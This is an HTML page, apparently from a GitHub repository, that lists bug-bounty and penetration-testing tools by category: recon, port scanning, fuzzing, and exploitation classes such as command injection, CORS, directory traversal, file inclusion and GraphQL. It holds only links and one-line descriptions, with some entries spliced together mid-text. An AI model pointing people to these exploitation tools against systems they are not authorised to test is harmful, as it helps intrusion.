-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
474 lines (457 loc) · 66.5 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<div data-target="readme-toc.content" class="Box-body px-5 pb-5">
<h1>Tool for bug bounty in 2022</h1>
<pre>
Recon
Subdomain Enumeration
Port Scanning
Technologies
Content Discovery
Links
Parameters
Fuzzing
Exploitation
Command Injection
CORS Misconfiguration
CRLF Injection
CSRF Injection
Directory Traversal
File Inclusion
GraphQL Injection
Header Injection
Insecure Deserialization
Insecure Direct Object References
Open Redirect
Race Condition
Request Smuggling
Server Side Request Forgery
SQL Injection
XSS Injection
XXE Injection
Miscellaneous
Passwords
Secrets
Git
Buckets
CMS
JSON Web Token
Subdomain Takeover
</pre>
<h2 dir="auto"><a id="user-content-recon" class="anchor" aria-hidden="true" href="recon"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Recon</h2>
<h3 dir="auto"><a id="user-content-subdomain-enumeration" class="anchor" aria-hidden="true" href="subdomain-enumeration"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Subdomain Enumeration</h3>
<ul dir="auto">
<li><a href="https://github.com/aboul3la/Sublist3r">Sublist3r</a> - Fast subdomains enumeration tool for penetration testers</li>
<li><a href="https://github.com/OWASP/Amass">Amass</a> - In-depth Attack Surface Mapping and Asset Discovery</li>
<li><a href="https://github.com/blechschmidt/massdns">massdns</a> - A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration)</li>
<li><a href="https://github.com/Findomain/Findomain">Findomain</a> - The fastest and cross-platform subdomain enumerator, do not waste your time.</li>
<li><a href="https://github.com/Screetsec/Sudomy">Sudomy</a> - Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting</li>
<li><a href="https://github.com/projectdiscovery/chaos-client">chaos-client</a> - Go client to communicate with Chaos DNS API.</li>
<li><a href="https://github.com/TypeError/domained">domained</a> - Multi Tool Subdomain Enumeration</li>
<li><a href="https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration">bugcrowd-levelup-subdomain-enumeration</a> - This repository contains all the material from the talk "Esoteric sub-domain enumeration techniques" given at Bugcrowd LevelUp 2017 virtual conference</li>
<li><a href="https://github.com/projectdiscovery/shuffledns">shuffledns</a> - shuffleDNS is a wrapper around massdns written in go that allows you to enumerate valid subdomains using active bruteforce as well as resolve subdomains with wildcard handling and easy input-output…</li>
<li><a href="https://github.com/christophetd/censys-subdomain-finder">censys-subdomain-finder</a> - Perform subdomain enumeration using the certificate transparency logs from Censys.</li>
<li><a href="https://github.com/fleetcaptain/Turbolist3r">Turbolist3r</a> - Subdomain enumeration tool with analysis features for discovered domains</li>
<li><a href="https://github.com/0xbharath/censys-enumeration">censys-enumeration</a> - A script to extract subdomains/emails for a given domain using SSL/TLS certificate dataset on Censys</li>
<li><a href="https://github.com/LordNeoStark/tugarecon">tugarecon</a> - Fast subdomains enumeration tool for penetration testers.</li>
<li><a href="https://github.com/cinerieus/as3nt">as3nt</a> - Another Subdomain ENumeration Tool</li>
<li><a href="https://github.com/si9int/Subra">Subra</a> - A Web-UI for subdomain enumeration (subfinder)</li>
<li><a href="https://github.com/nexxai/Substr3am">Substr3am</a> - Passive reconnaissance/enumeration of interesting targets by watching for SSL certificates being issued</li>
<li><a href="https://github.com/jhaddix/domain/">domain</a> - enumall.py Setup script for Regon-ng</li>
<li><a href="https://github.com/infosec-au/altdns">altdns</a> - Generates permutations, alterations and mutations of subdomains and then resolves them</li>
<li><a href="https://github.com/anshumanbh/brutesubs">brutesubs</a> - An automation framework for running multiple open sourced subdomain bruteforcing tools (in parallel) using your own wordlists via Docker Compose</li>
<li><a href="https://github.com/lorenzog/dns-parallel-prober">dns-parallel-prober</a> - his is a parallelised domain name prober to find as many subdomains of a given domain as fast as possible.</li>
<li><a href="https://github.com/rbsec/dnscan">dnscan</a> - dnscan is a python wordlist-based DNS subdomain scanner.</li>
<li><a href="https://github.com/guelfoweb/knock">knock</a> - Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist.</li>
<li><a href="https://github.com/hakluke/hakrevdns">hakrevdns</a> - Small, fast tool for performing reverse DNS lookups en masse.</li>
<li><a href="https://github.com/projectdiscovery/dnsx">dnsx</a> - Dnsx is a fast and multi-purpose DNS toolkit allow to run multiple DNS queries of your choice with a list of user-supplied resolvers.</li>
<li><a href="https://github.com/projectdiscovery/subfinder">subfinder</a> - Subfinder is a subdomain discovery tool that discovers valid subdomains for websites.</li>
<li><a href="https://github.com/tomnomnom/assetfinder">assetfinder</a> - Find domains and subdomains related to a given domain</li>
<li><a href="https://github.com/nahamsec/crtndstry">crtndstry</a> - Yet another subdomain finder</li>
<li><a href="https://github.com/codingo/VHostScan">VHostScan</a> - A virtual host scanner that performs reverse lookups</li>
<li><a href="https://github.com/edoardottt/scilla">scilla</a> - Information Gathering tool - DNS / Subdomains / Ports / Directories enumeration</li>
<li><a href="https://github.com/topics/subdomain-enumeration">for more tools</a> </li> </ul>
<h3 dir="auto"><a id="user-content-port-scanning" class="anchor" aria-hidden="true" href="port-scanning"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Port Scanning</h3>
<ul dir="auto">
<li><a href="https://github.com/robertdavidgraham/masscan">masscan</a> - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.</li>
<li><a href="https://github.com/RustScan/RustScan">RustScan</a> - The Modern Port Scanner</li>
<li><a href="https://github.com/projectdiscovery/naabu">naabu</a> - A fast port scanner written in go with focus on reliability and simplicity.</li>
<li><a href="https://github.com/nmap/nmap">nmap</a> - Nmap - the Network Mapper. Github mirror of official SVN repository.</li>
<li><a href="https://github.com/trimstray/sandmap">sandmap</a> - Nmap on steroids. Simple CLI with the ability to run pure Nmap engine, 31 modules with 459 scan profiles.</li>
<li><a href="https://github.com/johnnyxmas/ScanCannon">ScanCannon</a> - Combines the speed of masscan with the reliability and detailed enumeration of nmap</li>
<li><a href="https://github.com/topics/port-scanner">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-technologies" class="anchor" aria-hidden="true" href="technologies"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Technologies</h3>
<ul dir="auto">
<li><a href="https://github.com/AliasIO/wappalyzer">wappalyzer</a> - Identify technology on websites.</li>
<li><a href="https://github.com/rverton/webanalyze">webanalyze</a> - Port of Wappalyzer (uncovers technologies used on websites) to automate mass scanning.</li>
<li><a href="https://github.com/claymation/python-builtwith">python-builtwith</a> - BuiltWith API client</li>
<li><a href="https://github.com/urbanadventurer/whatweb">whatweb</a> - Next generation web scanner</li>
<li><a href="https://github.com/RetireJS/ary of attack patterns and primitives for black-box application fault injection and resource discovery.</li>
<li><a href="https://github.com/1N3/IntruderPayloads">IntruderPayloads</a> - A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists.</li>
<li><a href="https://github.com/Bo0oM/fuzz.txt">fuzz.txt</a> - Potentially dangerous files</li>
<li><a href="https://github.com/googleprojectzero/fuzzilli">fuzzilli</a> - A JavaScript Engine Fuzzer</li>
<li><a href="https://github.com/Fuzzapi/fuzzapi">fuzzapi</a> - Fuzzapi is a tool used for REST API pentesting and uses API_Fuzzer gem</li>
<li><a href="https://github.com/ameenmaali/qsfuzz">qsfuzz</a> - qsfuzz (Query String Fuzz) allows you to build your own rules to fuzz query strings and easily identify vulnerabilities.</li>
<li><a href="https://github.com/d4rckh/vaf">vaf</a> - very advanced (web) fuzzer written in Nim.</li>
</ul>
<hr>
<h3 dir="auto"><a id="user-content-content-discovery" class="anchor" aria-hidden="true" href="content-discovery"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Content Discovery</h3>
<ul dir="auto">
<li><a href="https://github.com/OJ/gobuster">gobuster</a> - Directory/File, DNS and VHost busting tool written in Go</li>
<li><a href="https://github.com/C-Sto/recursebuster">recursebuster</a> - rapid content discovery tool for recursively querying webservers, handy in pentesting and web application assessments</li>
<li><a href="https://github.com/epi052/feroxbuster">feroxbuster</a> - A fast, simple, recursive content discovery tool written in Rust.</li>
<li><a href="https://github.com/maurosoria/dirsearch">dirsearch</a> - Web path scanner</li>
<li><a href="https://github.com/evilsocket/dirsearch">dirsearch</a> - A Go implementation of dirsearch.</li>
<li><a href="https://github.com/henshin/filebuster">filebuster</a> - An extremely fast and flexible web fuzzer</li>
<li><a href="https://github.com/stefanoj3/dirstalk">dirstalk</a> - Modern alternative to dirbuster/dirb</li>
<li><a href="https://github.com/digination/dirbuster-ng">dirbuster-ng</a> - dirbuster-ng is C CLI implementation of the Java dirbuster tool</li>
<li><a href="https://github.com/jaeles-project/gospider">gospider</a> - Gospider - Fast web spider written in Go</li>
<li><a href="https://github.com/hakluke/hakrawler">hakrawler</a> - Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application</li>
</ul>
<h3 dir="auto"><a id="user-content-links" class="anchor" aria-hidden="true" href="links"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Links</h3>
<ul dir="auto">
<li><a href="https://github.com/GerbenJavado/LinkFinder">LinkFinder</a> - A python script that finds endpoints in JavaScript files</li>
<li><a href="https://github.com/zseano/JS-Scan">JS-Scan</a> - a .js scanner, built in php. designed to scrape urls and other info</li>
<li><a href="https://github.com/arbazkiraak/LinksDumper">LinksDumper</a> - Extract (links/possible endpoints) from responses & filter them via decoding/sorting</li>
<li><a href="https://github.com/0xsha/GoLinkFinder">GoLinkFinder</a> - A fast and minimal JS endpoint extractor</li>
<li><a href="https://github.com/InitRoot/BurpJSLinkFinder">BurpJSLinkFinder</a> - Burp Extension for a passive scanning JS files for endpoint links.</li>
<li><a href="https://github.com/IAmStoxe/urlgrab">urlgrab</a> - A golang utility to spider through a website searching for additional links.</li>
<li><a href="https://github.com/tomnomnom/waybackurls">waybackurls</a> - Fetch all the URLs that the Wayback Machine knows about for a domain</li>
<li><a href="https://github.com/lc/gau">gau</a> - Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.</li>
<li><a href="https://github.com/003random/getJS">getJS</a> - A tool to fastly get all javascript sources/files</li>
</ul>
<h3 dir="auto"><a id="user-content-parameters" class="anchor" aria-hidden="true" href="parameters"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Parameters</h3>
<ul dir="auto">
<li><a href="https://github.com/maK-/parameth">parameth</a> - This tool can be used to brute discover GET and POST parameters</li>
<li><a href="https://github.com/PortSwigger/param-miner">param-miner</a> - This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.</li>
<li><a href="https://github.com/Bo0oM/ParamPamPam">ParamPamPam</a> - This tool for brute discover GET and POST parameters.</li>
<li><a href="https://github.com/s0md3v/Arjun">Arjun</a> - HTTP parameter discovery suite.</li>
<li><a href="https://github.com/devanshbatham/ParamSpider">ParamSpider</a> - Mining parameters from dark corners of Web Archives</li>
</ul>
<h3 dir="auto"><a id="user-content-fuzzing" class="anchor" aria-hidden="true" href="fuzzing"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Fuzzing</h3>
<ul dir="auto">
<li><a href="https://github.com/xmendez/wfuzz">wfuzz</a> - Web application fuzzer</li>
<li><a href="https://github.com/ffuf/ffuf">ffuf</a> - Fast web fuzzer written in Go</li>
<li><a href="https://github.com/fuzzdb-project/fuzzdb">fuzzdb</a> - Diction
<li><a href="https://github.com/topics/fuzzing">for more tools</a> </li>
</h2>
</div>
</div>
<h2 dir="auto"><a id="user-content-exploitation" class="anchor" aria-hidden="true" href="exploitation"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Exploitation</h2>
<h3 dir="auto"><a id="user-content-command-injection" class="anchor" aria-hidden="true" href="command-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Command Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/commixproject/commix">commix</a> - Automated All-in-One OS command injection and exploitation tool.</li>
<li><a href="https://github.com/topics/command-injection">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-cors-misconfiguration" class="anchor" aria-hidden="true" href="cors-misconfiguration"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>CORS Misconfiguration</h3>
<ul dir="auto">
<li><a href="https://github.com/s0md3v/Corsy">Corsy</a> - CORS Misconfiguration Scanner</li>
<li><a href="https://github.com/RUB-NDS/CORStest">CORStest</a> - A simple CORS misconfiguration scanner</li>
<li><a href="https://github.com/laconicwolf/cors-scanner">cors-scanner</a> - A multi-threaded scanner that helps identify CORS flaws/misconfigurations</li>
<li><a href="https://github.com/Shivangx01b/CorsMe">CorsMe</a> - Cross Origin Resource Sharing MisConfiguration Scanner</li>
<li><a href="https://github.com/topics/cors-scanner">for more tools</a> </li> </ul>
<h3 dir="auto"><a id="user-content-crlf-injection" class="anchor" aria-hidden="true" href="crlf-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>CRLF Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/dwisiswant0/crlfuzz">crlfuzz</a> - A fast tool to scan CRLF vulnerability written in Go</li>
<li><a href="https://github.com/MichaelStott/CRLF-Injection-Scanner">CRLF-Injection-Scanner</a> - Command line tool for testing CRLF injection on a list of domains.</li>
<li><a href="https://github.com/BountyStrike/Injectus">Injectus</a> - CRLF and open redirect fuzzer</li>
<li><a href="https://github.com/topics/crlf">for more tools </a> </li>
</ul>
<h3 dir="auto"><a id="user-content-csrf-injection" class="anchor" aria-hidden="true" href="csrf-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>CSRF Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/0xInfection/XSRFProbe">XSRFProbe</a> -The Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit.</li>
<li><a href="https://github.com/topics/csrf-scanner">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-directory-traversal" class="anchor" aria-hidden="true" href="directory-traversal"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Directory Traversal</h3>
<ul dir="auto">
<li><a href="https://github.com/wireghoul/dotdotpwn">dotdotpwn</a> - DotDotPwn - The Directory Traversal Fuzzer</li>
<li><a href="https://github.com/chrispetrou/FDsploit">FDsploit</a> - File Inclusion & Directory Traversal fuzzing, enumeration & exploitation tool.</li>
<li><a href="https://github.com/bayotop/off-by-slash">off-by-slash</a> - Burp extension to detect alias traversal via NGINX misconfiguration at scale.</li>
<li><a href="https://github.com/momenbasel/liffier">liffier</a> - tired of manually add dot-dot-slash to your possible path traversal? this short snippet will increment ../ on the URL.</li>
<li><a href="https://github.com/topics/directory-traversal">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-file-inclusion" class="anchor" aria-hidden="true" href="file-inclusion"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>File Inclusion</h3>
<ul dir="auto">
<li><a href="https://github.com/mzfr/liffy">liffy</a> - Local file inclusion exploitation tool</li>
<li><a href="https://github.com/Team-Firebugs/Burp-LFI-tests">Burp-LFI-tests</a> - Fuzzing for LFI using Burpsuite</li>
<li><a href="https://github.com/mthbernardes/LFI-Enum">LFI-Enum</a> - Scripts to execute enumeration via LFI</li>
<li><a href="https://github.com/D35m0nd142/LFISuite">LFISuite</a> - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner</li>
<li><a href="https://github.com/hussein98d/LFI-files">LFI-files</a> - Wordlist to bruteforce for LFI</li>
<li><a href="https://github.com/topics/local-file-inclusion">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-graphql-injection" class="anchor" aria-hidden="true" href="graphql-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>GraphQL Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/doyensec/inql">inql</a> - InQL - A Burp Extension for GraphQL Security Testing</li>
<li><a href="https://github.com/swisskyrepo/GraphQLmap">GraphQLmap</a> - GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.</li>
<li><a href="https://github.com/szski/shapeshifter">shapeshifter</a> - GraphQL security testing tool</li>
<li><a href="https://github.com/zidekmat/graphql_beautifier">graphql_beautifier</a> - Burp Suite extension to help make Graphql request more readable</li>
<li><a href="https://github.com/nikitastupin/clairvoyance">clairvoyance</a> - Obtain GraphQL API schema despite disabled introspection!</li>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection">for more tools</a> </li>
</ul>
